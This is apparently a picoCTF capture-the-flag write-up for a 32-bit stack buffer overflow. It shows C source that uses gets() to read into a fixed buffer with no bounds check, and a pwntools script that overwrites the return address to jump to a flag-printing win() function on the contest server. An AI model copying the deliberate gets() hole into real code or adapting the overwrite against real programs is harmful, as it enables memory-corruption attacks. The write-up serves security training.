Buffer Overflow 1

#buffer-overflow

Contents

Source

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"

#define BUFSIZE 32
#define FLAGSIZE 64

void win() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFSIZE];
  gets(buf);

  printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}

Solution

from pwn import *

if args.REMOTE:
    r = remote("saturn.picoctf.net", 51982)
else:
    r = process("./vuln")

offset = b'i' * 0x2c
win = p32(0x80491f6)

p = offset + win

r.sendlineafter(b': ', p)

flag = r.recvall().decode("ascii")

print()
log.success(flag)
print()

r.close()